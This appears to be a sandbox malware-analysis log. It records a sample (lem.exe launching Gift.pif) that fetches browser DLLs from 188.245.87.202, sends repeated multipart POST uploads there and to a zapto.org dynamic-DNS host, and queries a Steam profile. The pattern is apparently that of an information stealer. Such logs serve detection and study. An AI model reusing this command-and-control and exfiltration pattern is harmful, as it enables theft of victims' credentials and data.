                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBFBFCBFBKECAAKJKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHCFIJEGCAKJJKEHJJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFHIIDHJEBFBFIDAKFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 7009Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHIIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 6985Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 32481Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 4421Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 2449Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHIDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 6533Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 3269Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHIJEBKEBGHIDHJKJEGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 11445Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHIJEBKEBGHIDHJKJEGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 11449Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 4277Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 4273Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 4317Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBGHCFCAAFIECAFIIIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 1977Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBGHCFCAAFIECAFIIIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 3161Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBKJDGIJECFIEBFIDHCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 1697Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAFCAFHJJDBFIECFBKEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 1929Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 465Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JECAFHJEGCFCBFIEGCAEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJJDHDGDAAKECAKJDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: arpdabl.zapto.orgContent-Length: 50529Connection: Keep-AliveCache-Control: no-cache
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: unknownTCP traffic detected without corresponding DNS query: 188.245.87.202
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_003429BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,11_2_003429BA
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: KLUpntqKswLWgWJpHbymfJYffqy.KLUpntqKswLWgWJpHbymfJYffqy
                        Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                        Source: global trafficDNS traffic detected: DNS query: arpdabl.zapto.org
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.FCBFIEGCAE
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.GCAE
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org
                        Source: Gift.pif, 0000000B.00000002.3226364575.00000000128B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org/
                        Source: Gift.pif, 0000000B.00000002.3226364575.00000000128B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org/TH
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.orgE
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zaptoEGCAE
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: lem.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                        Source: Gift.pif, 0000000B.00000002.3221967002.000000000BED5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: lem.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: lem.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
